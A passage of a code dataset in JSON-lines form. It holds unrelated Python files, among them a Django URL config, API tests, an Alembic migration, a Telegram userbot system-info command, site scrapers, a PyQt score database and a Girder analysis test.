energy_ai = abs(action - direction_boundary) * temperature_step\n    next_state, reward, game_over = env.update_env(direction, energy_ai, int(timestep/(30*24*60)))\n    current_state = next_state\n\n    \n# PRINT THE TRAINING RESULTS AT THE END OF THE EPOCH\nprint(\"\\n\")\nprint(\" - Energía total gastada por el sistema con IA: {:.0f} J.\".format(env.total_energy_ai))\nprint(\" - Energía total gastada por el sistema sin IA: {:.0f} J.\".format(env.total_energy_noai))\nprint(\"ENERGÍA AHORRADA: {:.0f} %.\".format(100*(env.total_energy_noai - env.total_energy_ai)/env.total_energy_noai ))\n","sub_path":"2. MC/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"540863469","text":"\"\"\"instagram URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom posting.views import *\nfrom account.views import *\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', home, name=\"home\"),\n    path('<str:id>',detail,name=\"detail\"),#str is the converter type, id is the name given to the view parameter\n    # path('posting/',include('posting.urls')),\n    path('account/',include('account.urls')),\n    path('new/', new , name = \"new\" ),\n    path('create/', create, name= \"create\"),\n    path('edit/', edit, name=\"edit\"),\n    path('update/',update,name=\"update\"),\n    path('feed_create/',feed_create,name=\"feed_create\"),\n    path('feed/',feed,name=\"feed\"),\n    path('profile/',profile, name=\"profile\"),\n    path('delete/', delete , name=\"delete\"),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"instagram/instagram/instagram/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392145296","text":"\n\nimport os\n\nfrom tests.test_common import *\n\n####################\n## Path constants ##\n####################\nRELAX_OPTIONS = os.path.join(RELAX_PATH, 'options.relax.xml')\nRELAX_SELECT = os.path.join(RELAX_PATH, 'select.relax.xml')\n\n##################\n## Test classes ##\n##################\nclass TestSupport(TestApi):\n\n    def test_support_jurisdictions(self):\n        \"\"\"/support/jurisdictions served properly.\"\"\"\n        res = self.app.get('/support/jurisdictions') \n        body = self.makexml(res.body)\n        assert relax_validate(RELAX_OPTIONS, body)\n\n    def test_javascript(self):\n        \"\"\"Test javascript wrapper over /support/jurisdictions.\"\"\"\n        res = self.app.get('/support/jurisdictions')\n        jsres = self.app.get('/support/jurisdictions.js')\n        opts = res.body.strip().split('\\n')\n        jsopts = jsres.body.strip().split('\\n')\n        assert len(opts) == len(jsopts)\n        for i in range(len(opts)):\n            assert \"document.write('%s');\" % opts[i] == jsopts[i]\n\n    def test_ignore_extra_args(self):\n        \"\"\"Extra arguments are ignored.\"\"\"\n        res = self.app.get('/support/jurisdictions?foo=bar')\n        body = self.makexml(res.body)\n        assert 
relax_validate(RELAX_OPTIONS, body)\n\n ''' NOTE: locale el causes server error; fix in next implementation\n def test_locale(self):\n \"\"\"Test locale parameter.\"\"\"\n for locale in self.data.locales():\n res = self.app.get('/support/jurisdictions?locale=%s' % locale)\n body = self.makexml(res.body)\n assert relax_validate(RELAX_OPTIONS, body)\n '''\n\n def test_select(self):\n \"\"\"Test select parameter.\"\"\"\n res = self.app.get('/support/jurisdictions?select=foo')\n body = res.body.replace('&', '&')\n assert relax_validate(RELAX_SELECT, body)\n","sub_path":"tests/test_support.py","file_name":"test_support.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"212360892","text":"\"\"\"Add TopicSynonym model.\n\nRevision ID: 29b3b8eae57a\nRevises: 27651591b3f5\nCreate Date: 2015-06-01 15:41:56.570502\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '29b3b8eae57a'\ndown_revision = '27651591b3f5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('topic_synonym',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=200), nullable=True),\n sa.Column('pinyin', sa.String(length=200), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('topic_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['topic_id'], ['topic.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('topic_synonym')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/20150601154156_29b3b8eae57a_add_topicsynonym_model.py","file_name":"20150601154156_29b3b8eae57a_add_topicsynonym_model.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"280229576","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom pyrogram import Client, filters\nimport asyncio\nimport requests, os, platform\n\n@Client.on_message(filters.command(['sistem'], ['!','.','/']) & filters.me)\nasync def sistem(client, message):\n # < Başlangıç\n uyku = await message.edit(\"__asyncio.sleep(0.3)__\")\n await asyncio.sleep(0.3)\n \n cevaplanan_mesaj = message.reply_to_message\n if cevaplanan_mesaj is None:\n yanitlanacak_mesaj = message.message_id\n else:\n yanitlanacak_mesaj = cevaplanan_mesaj.message_id\n \n await uyku.delete()\n ilk_mesaj = await message.reply(\"__Bekleyin..__\",\n reply_to_message_id = yanitlanacak_mesaj,\n disable_web_page_preview = True,\n parse_mode = \"Markdown\"\n )\n #------------------------------------------------------------- Başlangıç >\n\n try:\n mesaj = f\"\"\"__Kullanıcı :__ `{os.getlogin()}@{platform.node()}`\n __IP :__ `{requests.get('http://ip.42.pl/raw').text}`\n __OS :__ `{platform.system()} | {platform.release()}`\n __İşlemci :__ `{platform.processor()}`\"\"\"\n await ilk_mesaj.edit(mesaj)\n \n except Exception as hata:\n await ilk_mesaj.edit(f\"__başaramadık abi__\\n\\n\\t`{hata}`\")","sub_path":"kekikUserBot/userBot/botAlani/Eklentiler/sistem.py","file_name":"sistem.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"138988023","text":"\"\"\" Tests running a 1D grid for 
Abstraction\n\"\"\"\n\nimport os\n\nimport elstruct\nimport gridopt\n\n\ndef run_grid():\n \"\"\" Run constrained optimizations at each point on the 1D grid\n \"\"\"\n\n # transition state zmatrix\n test_zmat = (\n (('N', (None, None, None), (None, None, None)), \n ('H', (0, None, None), ('r1', None, None)), \n ('H', (0, 1, None), ('r2', 'a1', None)), \n ('H', (0, 1, 2), ('r3', 'a2', 'd1')), \n ('X', (3, 0, 1), ('r4', 'a3', 'd2')), \n ('O', (3, 4, 0), ('r5', 'a4', 'd3')), \n ('H', (5, 3, 4), ('r6', 'a5', 'd4'))), \n {'r1': 1.92561, \n 'r2': 1.92561, 'a1': 1.849997, \n 'r3': 1.92561, 'a2': 1.849997, 'd1': 1.961087, \n 'r4': 1.88973, 'a3': 1.5707963267948966, 'd2': 3.141592653589793, \n 'r6': 2.69082, \n 'r5': 111.111, 'a4': 1.4835298641951802, 'd3': 3.141592653589793, \n 'a5': 1.4835298641951802, 'd4': 1.5707963267948966}\n )\n\n # Get the charge and multiplicity of the transition state\n charge = 0 \n mult = 2\n orb_rest = False \n \n # Get submission information\n run_script_str = '''#!/bin/bash\n CWD=$(pwd)\n HOST=b440\n export GAUSS_SCRDIR=/scratch/$USER \n ssh -n $HOST \" module load gaussian/09-e.01 ; \n mkdir -p $GAUSS_SCRDIR ; \n g09 -scrdir=$GAUSS_SCRDIR < $CWD/run.inp > $CWD/run.out \" '''\n prog = 'g09'\n \n # Get level of theory for jobs\n method = 'wb97xd'\n basis = '6-31g*'\n \n # Get the scan coordinates for the Abstraction Reaction\n rmin = 1.1 * 1.88973\n rmax = 1.8 * 1.88973\n nr = 7\n step = (rmax - rmin) / float(nr) \n rsteps = [rmin + step*i for i in range(nr+1)]\n\n # Set scan coordinates\n rts = ['r5']\n\n # Set dummy-atom coordinates\n dum_coords = ['r4', 'a3', 'd2'] \n\n # Set coordinates to freeze\n froz_coords = rts + dum_coords \n\n # Build a set of grid ts zmats\n grid_ts_zmats = gridopt.build_grid_ts_zmatrices(test_zmat, rts, rsteps)\n\n # Loop over the TS Z-Matrices to run optimizations\n for i, zmat in enumerate(grid_ts_zmats):\n \n # Set run directory for each grid point\n run_dir_str = './GridOpt/'+str(i+1)\n os.mkdir(run_dir_str)\n \n # Call the electronic structure optimization\n INP_STR, OUT_STR = elstruct.run.direct(\n script_str=run_script_str,\n run_dir=run_dir_str,\n input_writer=elstruct.writer.optimization,\n prog=prog,\n method=method,\n basis=basis,\n geom=zmat,\n mult=mult,\n charge=charge,\n orb_restricted=orb_rest,\n frozen_coordinates=froz_coords,\n job_options=(\n elstruct.option.specify(elstruct.Option.Opt.MAXITER_, 60),)\n )\n","sub_path":"tests/test__run_grid.py","file_name":"test__run_grid.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150255011","text":"\n\nimport WebMirror.util.webFunctions as webFunctions\nimport WebMirror.LogBase as LogBase\nimport WebMirror.rules\nimport urllib.parse\n\nclass SiteSyncFetch(LogBase.LoggerMixin):\n\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.wg = webFunctions.WebGetRobust()\n\t\tself.log.info(\"Startup!\")\n\n\n\t@classmethod\n\tdef getGroupSites(cls):\n\t\tinstance = cls()\n\t\treturn instance.go()\n\nclass NovelUpdatesFetch(SiteSyncFetch):\n\tloggerPath = \"Main.NovelUpdatesFetcher\"\n\n\tdef getGroupSubpages(self):\n\t\tret = []\n\n\t\tfor x in range(500000):\n\t\t\turl = 'http://www.novelupdates.com/groupslist/?pg={num}'.format(num=x)\n\n\t\t\tsoup = self.wg.getSoup(url)\n\t\t\tmain = soup.find(\"div\", class_='g-cols')\n\n\t\t\tnew = []\n\t\t\tfor item in main.find_all(\"li\"):\n\t\t\t\tif item.a:\n\t\t\t\t\tnew.append(item.a['href'])\n\t\t\tif new:\n\t\t\t\tret += new\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tself.log.info(\"Found %s group subpage URLs\", 
len(ret))\n\n\t\treturn ret\n\n\tdef urlFromGroupPage(self, url):\n\t\tsoup = self.wg.getSoup(url)\n\t\tcontent = soup.find('div', class_='w-blog-content')\n\t\tif not content:\n\t\t\traise ValueError(\"Wat?\")\n\t\trows = content.find_all('tr')\n\t\tfor row in rows:\n\t\t\ttds = row.find_all(\"td\")\n\t\t\tif len(tds) == 2:\n\t\t\t\tname, val = tds\n\t\t\t\tif name.get_text() == \"URL\":\n\t\t\t\t\tif val.a:\n\t\t\t\t\t\treturn val.a['href']\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn None\n\t\telse:\n\t\t\traise ValueError(\"Watt?\")\n\n\tdef go(self):\n\t\t# self.urlFromGroupPage('http://www.novelupdates.com/group/anon-empire/')\n\n\t\tret = []\n\t\tsp = self.getGroupSubpages()\n\t\tfor p in sp:\n\t\t\tpg = self.urlFromGroupPage(p)\n\t\t\tif pg:\n\t\t\t\tret.append(pg)\n\t\t\tself.log.info(\"Content page: %s\", pg)\n\t\t# \tpass\n\t\t# \t# print(p)\n\t\treturn ret\n\n\nclass AhoUpdatesFetch(SiteSyncFetch):\n\n\tloggerPath = \"Main.AhoUpdatesFetcher\"\n\n\n\n\tdef getGroupSubpages(self):\n\t\tret = []\n\n\t\tfor x in range(500000):\n\t\t\turl = 'http://aho-updates.com/groups?sort_by=title&sort_order=ASC&page={num}'.format(num=x)\n\t\t\tsoup = self.wg.getSoup(url)\n\n\t\t\tmain = soup.find_all(\"div\", class_='views-row')\n\n\t\t\tnew = 0\n\t\t\tfor item in [tmp for tmp in main if tmp.a]:\n\t\t\t\turl = item.a['href']\n\t\t\t\tif url.startswith(\"/group/\"):\n\t\t\t\t\turl = urllib.parse.urljoin('http://aho-updates.com/', url)\n\t\t\t\t\tif url not in ret:\n\t\t\t\t\t\tret.append(url)\n\t\t\t\t\t\tnew += 1\n\n\t\t\tif new == 0:\n\t\t\t\tbreak\n\n\t\tself.log.info(\"Found %s group subpage URLs\", len(ret))\n\n\t\treturn ret\n\n\tdef urlFromGroupPage(self, url):\n\t\tsoup = self.wg.getSoup(url)\n\t\tcontent = soup.find('div', class_='field-name-field-lnu-grp-website')\n\t\tif not content:\n\t\t\tcontent = soup.find('span', class_='views-field-field-lnu-feed-main-url')\n\t\t\tif not content:\n\t\t\t\traise ValueError(\"Wat?\")\n\t\tif not content.a:\n\t\t\traise ValueError(\"Wattt?\")\n\t\treturn content.a['href']\n\n\tdef go(self):\n\t\t# print(self.urlFromGroupPage('http://aho-updates.com/group/dark-translations'))\n\n\t\tret = []\n\t\tsp = self.getGroupSubpages()\n\t\tfor p in sp:\n\t\t\tpg = self.urlFromGroupPage(p)\n\t\t\tif pg:\n\t\t\t\tret.append(pg)\n\t\t\tself.log.info(\"Content page: %s\", pg)\n\t\treturn ret\n\n\ndef getExistingUrls():\n\trules = WebMirror.rules.load_rules()\n\n\tnetlocs = [item['starturls'] for item in rules if item['starturls']]\n\tnetlocs = [list(set([urllib.parse.urlsplit(item).netloc for item in tmp])) for tmp in netlocs]\n\n\t[item.sort() for item in netlocs]\n\n\tret = []\n\tfor items in netlocs:\n\t\tret += items\n\tprint(\"Have %s existing urls!\" % len(ret))\n\treturn ret\n\n\ndef fetch_other_sites():\n\tv1 = NovelUpdatesFetch.getGroupSites()\n\tv2 = AhoUpdatesFetch.getGroupSites()\n\n\tvals = v1+v2\n\n\thave = getExistingUrls()\n\n\tvals = set(vals)\n\n\tmissed = []\n\tfor val in vals:\n\t\tvloc = urllib.parse.urlsplit(val).netloc\n\t\tif not vloc in have:\n\t\t\tprint(\"New: \", vloc)\n\t\t\tmissed.append(vloc)\n\twith open(\"missed-urls.txt\", \"w\") as fp:\n\t\tfor miss in missed:\n\t\t\tfp.write(\"%s\\n\" % miss)\n\n","sub_path":"WebMirror/SiteSync/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"270005887","text":"def checkMulti(text):\n twice = False\n thrice = False\n letters = set(text)\n for letter in letters:\n if 
text.count(letter) == 2:\n            twice = True\n        elif text.count(letter) == 3:\n            thrice = True\n    return (twice, thrice)\n\ndef compare_ids(id1, id2):\n    count = 0\n    for a, b in zip(id1, id2):\n        if a != b:\n            count += 1\n        if count > 1:\n            return False\n    return True\n\ndef find_match(id_list):\n    for i, id_val in enumerate(id_list):\n        for id_comp in id_list[i + 1:]:\n            if compare_ids(id_val, id_comp):\n                return ''.join([i for i, j in zip(id_val, id_comp) if i == j])\n\nid_list = []\nwith open(r'day2.txt', 'r') as data:\n    twice = 0\n    thrice = 0\n\n    for line in data.readlines():\n        _2, _3 = checkMulti(line)\n        twice += _2\n        thrice += _3\n        if _2 or _3:\n            id_list.append(line.rstrip())\n\n    print(f'checksum: {twice * thrice}')\n    print(f'common letters between 2 correct id\\'s: {find_match(id_list)}')\n\n","sub_path":"2018/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"361394138","text":"import pickle\nimport sys\nfrom PyQt5.QtWidgets import (QWidget, QPushButton,\n QHBoxLayout, QVBoxLayout, QApplication, QLabel,\n QComboBox, QTextEdit, QLineEdit)\nfrom PyQt5.QtCore import Qt\n\n\n\nclass ScoreDB(QWidget):\n\n    def __init__(self):\n        super().__init__()\n        self.initUI()\n        self.dbfilename = 'assignment6.dat'\n        self.scoredb = []\n        self.readScoreDB()\n        self.showScoreDB()\n\n    def initUI(self):\n\n        # 1st row.\n        Name = QLabel(\"Name : \") # create the name, age, and score labels.\n        Age = QLabel(\"Age : \")\n        Score = QLabel(\"Score : \")\n\n        self.NameEdit = QLineEdit() # create the name, age, and score text fields.\n        self.AgeEdit = QLineEdit()\n        self.ScoreEdit = QLineEdit()\n\n        f1 = QHBoxLayout()\n\n        f1.addWidget(Name)\n        f1.addWidget(self.NameEdit)\n\n        f1.addWidget(Age)\n        f1.addWidget(self.AgeEdit)\n\n        f1.addWidget(Score)\n        f1.addWidget(self.ScoreEdit)\n\n        # 2nd row.\n        Amount = QLabel(\"Amount:\")\n        self.AmountEdit = QLineEdit()\n\n        self.Combobox = QComboBox() # create a selection box\n        self.Combobox.addItems([\"Score\", \"Name\", \"Age\"]) # add 3 items / use addItem for a single item\n\n        Key = QLabel(\"Key:\")\n\n        f2 = QHBoxLayout()\n        f2.addStretch(100)\n\n        f2.addWidget(Amount)\n        f2.addWidget(self.AmountEdit)\n\n        f2.addWidget(Key)\n        f2.addWidget(self.Combobox)\n\n\n        # 3rd row.\n        btn2 = QPushButton(\"Add\",self)\n        btn2.clicked.connect(self.add_btn_clicked)\n\n        btn3 = QPushButton(\"Del\",self)\n        btn3.clicked.connect(self.del_btn_clicked)\n\n        btn4 = QPushButton(\"Find\",self)\n        btn4.clicked.connect(self.find_btn_clicked)\n\n        btn5 = QPushButton(\"Inc\",self)\n        btn5.clicked.connect(self.inc_btn_clicked)\n\n        btn6 = QPushButton(\"show\",self)\n        btn6.clicked.connect(self.show_btn_clicked)\n\n        f3 = QHBoxLayout()\n        f3.addStretch(100)\n\n        f3.addWidget(btn2)\n        f3.addWidget(btn3)\n        f3.addWidget(btn4)\n        f3.addWidget(btn5)\n        f3.addWidget(btn6)\n\n\n        # 4th row.\n        Result = QLabel(\"Result :\")\n\n        self.Text_box = QTextEdit(self)\n        self.Text_box.setReadOnly(True) # read-only; no input allowed\n\n        f4 = QVBoxLayout()\n        f4.addLayout(f1)\n        f4.addLayout(f2)\n        f4.addLayout(f3)\n        f4.addWidget(Result)\n        f4.addWidget(self.Text_box)\n        #etc\n\n        self.setLayout(f4)\n        self.setGeometry(300, 300, 500, 250)\n        self.setWindowTitle('Assignment6')\n        self.show()\n\n    def closeEvent(self, event):\n        self.writeScoreDB()\n\n    def readScoreDB(self):\n        try:\n            fH = open(self.dbfilename, 'rb')\n        except FileNotFoundError as e:\n            self.scoredb = []\n            return\n\n        try:\n            self.scoredb = pickle.load(fH)\n        except:\n            pass\n        else:\n            pass\n        fH.close()\n\n\n    # write the data into person db\n    def writeScoreDB(self):\n        fH = 
open(self.dbfilename, 'wb')\n        pickle.dump(self.scoredb, fH)\n        fH.close()\n\n    def showScoreDB(self):\n        list = []\n        self.Text_box.setPlainText(\"\")\n        for p in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n            for attr in sorted(p):\n                list.append(str(attr) + \"=\" + str(p[attr]))\n            self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n            list = []\n\n    def show_btn_clicked(self):\n        list = []\n        self.Text_box.setPlainText(\"\")\n        keyname = str(self.Combobox.currentText())\n        for p in sorted(self.scoredb, key = lambda person : person[keyname]):\n            for attr in sorted(p):\n                list.append(str(attr) + \"=\" + str(p[attr]))\n            self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n            list = []\n\n\n    def add_btn_clicked(self):\n        list = []\n        self.Text_box.setPlainText(\"\")\n        Name = self.NameEdit.text() # get the entered text\n        Age = self.AgeEdit.text()\n        Score = self.ScoreEdit.text()\n        record = {'Name': Name, 'Age': Age, 'Score': Score}\n        self.scoredb += [record]\n        for p in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n            for attr in sorted(p):\n                list.append(str(attr) + \"=\" + str(p[attr]))\n            self.Text_box.append(list[0]+ \" \" + list[1]+ \" \" + list [2])\n            list = []\n        self.NameEdit.clear()\n        self.AgeEdit.clear()\n        self.ScoreEdit.clear()\n\n    def del_btn_clicked(self):\n        list = []\n        self.Text_box.setPlainText(\"\")\n        for p in self.scoredb:\n            if p['Name'] == self.NameEdit.text():\n                self.scoredb.remove(p)\n        for q in sorted(self.scoredb, key=lambda person: person[\"Name\"]):\n            for attr in sorted(q):\n                list.append(str(attr) + \"=\" + str(q[attr]))\n            self.Text_box.append(list[0] + \" \" + list[1] + \" \" + list[2])\n            list = []\n\n    def find_btn_clicked(self):\n        self.Text_box.setPlainText(\"\")\n        Name = self.NameEdit.text() # get the entered text\n        Age = self.AgeEdit.text()\n        Score = self.ScoreEdit.text()\n        for i in self.scoredb:\n            if i['Name'] == Name :\n                self.Text_box.append(\"Age=\"+ \" \"+str(i[\"Age\"])+ \" \"+ \"Name=\"+ \" \"+ str(i[\"Name\"])+ \" \"+ \"Score=\"+ \" \"+str(i[\"Score\"]))\n        self.NameEdit.clear()\n        self.AgeEdit.clear()\n        self.ScoreEdit.clear()\n\n    def inc_btn_clicked(self):\n        self.Text_box.setPlainText(\"\")\n        for s in self.scoredb:\n            if s['Name'] == self.NameEdit.text():\n                s['Score'] = int(s['Score'])\n                s['Score'] = s['Score'] + int(self.AmountEdit.text())\n                s['Score'] = str(s['Score'])\n                break\n        self.showScoreDB()\n        self.NameEdit.clear()\n        self.AgeEdit.clear()\n        self.ScoreEdit.clear()\n        self.AmountEdit.clear()\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = ScoreDB()\n    sys.exit(app.exec_())\n\n","sub_path":"after/asm 6.py","file_name":"asm 6.py","file_ext":"py","file_size_in_byte":6241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"169151360","text":"\"\"\"Main module.\"\"\"\nimport os\nimport functools\n\n__all__ = [\n 'get', 'mk_shortcut', 'get_float', 'get_int', 'get_bool', 'get_str', 'IS_OK'\n]\n\nIS_OK = ['True', ]\nMISSING_VALUE = object()\n\n\ndef get(name, cast, required=True, default=None, validate=lambda x: None, **kwargs):\n    \"\"\"Get name from env.\n\n    :param str name: The variable name\n    :param callable cast: The function that casts the variable\n    :param bool required: Default True\n    :param any default: ignored if `required` is True\n    :param callable validate: The function that validates the variable\n\n    :return: variable\n    :rtype: same as `cast` return\n\n    :raises ValueError: if `cast` is not a callable\n    :raises AttributeError: if `required` is True and `name` is 
undefined\n \"\"\"\n\n if not callable(cast):\n msg = 'cast: {} is not a callable'.format(\n cast.__class__.__name__\n )\n raise ValueError(msg)\n\n value = os.environ.get(name, MISSING_VALUE)\n\n if value is MISSING_VALUE:\n if required:\n raise AttributeError('{} is required'.format(name))\n validate(default)\n return default\n\n casted = cast(value)\n validate(casted)\n return casted\n\n\ndef mk_shortcut(cast):\n \"\"\"ciao.\"\"\"\n return functools.partial(get, cast=cast)\n\n\nget_str = mk_shortcut(str)\nget_str.__name__ = 'get_str'\nget_str.__doc__ = \"\"\"\n Get str from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: str\n \"\"\"\n\nget_float = mk_shortcut(float)\nget_float.__name__ = 'get_float'\nget_float.__doc__ = \"\"\"\n Get float from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: float\n \"\"\"\n\nget_int = mk_shortcut(int)\nget_int.__name__ = 'get_int'\nget_int.__doc__ = \"\"\"\n Get int from env.\n\n :param str name: The variable name\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: int\n \"\"\"\n\n\ndef get_bool(name, is_ok=None, **kwargs):\n \"\"\"Get bool from env.\n\n :param str name: The variable name\n :param list(str) is_ok: truthy string list\n :param kwargs: see :py:func:`get`\n\n :return: variable\n :rtype: bool\n \"\"\"\n if not is_ok:\n is_ok = IS_OK\n return get(name, lambda x: x in is_ok, **kwargs)\n","sub_path":"envi/envi.py","file_name":"envi.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"236440985","text":"from django.core.management.base import BaseCommand\nfrom hostelAdmin.models import Hostel\nfrom webpage.models import Student, Rating, User\nimport random\nimport csv\n\nclass Command(BaseCommand):\n\n def handle(self,*args,**kwargs):\n with open('data.csv', mode='w', newline='') as rate_file:\n test_data_writer = csv.writer(rate_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n hostels = []\n users = []\n for hostel in Rating.objects.order_by('hostel').values('hostel').distinct() :\n hostel = Hostel.objects.get(id=hostel['hostel']);\n hostels.append(hostel)\n\n for student in Rating.objects.order_by('user').values('user').distinct() :\n user = User.objects.get(id=student['user']);\n users.append(user)\n\n header = []\n header.append('rating')\n for h in hostels:\n header.append(h.id)\n test_data_writer.writerow(header)\n\n for u in users:\n rate=[]\n rate.append(u.id)\n for h in hostels:\n if Rating.objects.filter(hostel=h,user=u).exists():\n r=Rating.objects.filter(hostel=h,user=u).first()\n rate.append(r.rating)\n else:\n r=None\n rate.append('0')\n print(r)\n test_data_writer.writerow(rate)\n","sub_path":"hostelfinder/webpage/management/commands/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"474942544","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Copyright Kitware Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in 
writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\n\nimport httmock\nfrom httmock import urlmatch, HTTMock\nimport json\nimport os\nimport sys\nimport time\n\n# Need to set the environment variable before importing girder\ngirder_port = os.environ.get('GIRDER_TEST_PORT', '20200')\nos.environ['GIRDER_PORT'] = girder_port# noqa\n\nfrom tests import base\nfrom girder_client import GirderClient\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../utility')))\nimport import_analyses\n\ndef setUpModule():\n \"\"\"\n Enable the minerva plugin and start the server.\n \"\"\"\n base.enabledPlugins.append('jobs')\n base.enabledPlugins.append('romanesco')\n base.enabledPlugins.append('gravatar')\n base.enabledPlugins.append('minerva')\n base.startServer(False)\n\n\ndef tearDownModule():\n \"\"\"\n Stop the server.\n \"\"\"\n base.stopServer()\n\nclass AnalysisTestCase(base.TestCase):\n \"\"\"\n Tests of the minerva analysis functionality.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Set up the test case with a user\n \"\"\"\n super(AnalysisTestCase, self).setUp()\n\n self._user = self.model('user').createUser(\n 'minervauser', 'password', 'minerva', 'user',\n 'minervauser@example.com')\n\n def testAnalysisUtilityEndpoints(self):\n \"\"\" Test the minerva analysis utility endpoints. \"\"\"\n\n # at first there is no analysis folder or minerva collection\n\n path = '/minerva_analysis/folder'\n response = self.request(path=path, method='GET')\n self.assertStatus(response, 401) # unauthorized\n\n response = self.request(path=path, method='GET', user=self._user)\n self.assertStatusOk(response)\n self.assertEquals(response.json['folder'], None, 'No analysis folder should exist')\n\n # create the analysis folder\n\n response = self.request(path=path, method='POST', user=self._user)\n self.assertStatusOk(response)\n self.assertNotEquals(response.json['folder'], None, 'An analysis folder should exist')\n\n # ensure we can get it\n\n response = self.request(path=path, method='GET', user=self._user)\n self.assertStatusOk(response)\n self.assertNotEquals(response.json['folder'], None, 'An analysis folder should exist')\n\n def testBsveSearchAnalysis(self):\n # create the analysis folder\n path = '/minerva_analysis/folder'\n response = self.request(path=path, method='POST', user=self._user)\n self.assertStatusOk(response)\n analyses_folder = response.json['folder']\n\n # import the bsve analysis\n client = GirderClient('localhost', girder_port)\n client.authenticate('minervauser', 'password')\n\n bsve_analysis_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../analyses/bsve'))\n import_analyses.import_analyses(client, bsve_analysis_path)\n\n path = '/item'\n params = {\n 'folderId': analyses_folder['_id']\n }\n response = self.request(path=path, method='GET', params=params, user=self._user)\n self.assertStatusOk(response)\n self.assertEquals(len(response.json), 1, 'Expecting only one analysis')\n analysis = response.json[0]\n self.assertEquals(analysis['name'], 'bsve search', 'Expecting analysis name to be \"bsve search\"')\n expected_meta = {\n u'minerva': {\n u'analysis_type': u'bsve_search',\n u'analysis_name': u'bsve search',\n u'analysis_id': 
